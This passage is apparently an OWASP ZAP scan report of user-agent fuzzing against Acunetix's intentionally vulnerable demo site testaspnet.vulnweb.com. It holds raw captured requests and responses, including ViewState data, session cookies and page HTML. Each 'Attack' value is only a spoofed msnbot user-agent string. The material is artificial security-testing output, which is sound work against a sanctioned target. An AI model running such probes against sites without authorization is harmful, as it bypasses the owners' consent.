href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 547 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1073 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,073 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8234&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeC1Zpc2libGVEYXRlBgAAOKT0WtoIZGRkoDyihe4aBkydjH8w4Au1OqWTAno%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK4iu4fArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp%2FUCAuadp%2FUCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl%2BYFAuadl%2BYFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C%2B6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5D90gZPH3ZpV96zCGwwsL0kbQqUd5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:10 GMT Content-Length: 12545
Response Body - size: 12,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAPXVQaNoIZGRktz4hs1LM1tRf16gqkEvr27FRuZU=" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtovW9CgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/PcxrR1ACpphK5BFKvNgA+c3yYTQ==" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>July 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></font></td><td align="center" bgcolor="Silver" width="14%"><font color="White" size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:White" title="July 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 365 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:11 GMT Content-Length: 13494
Response Body - size: 13,494 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" 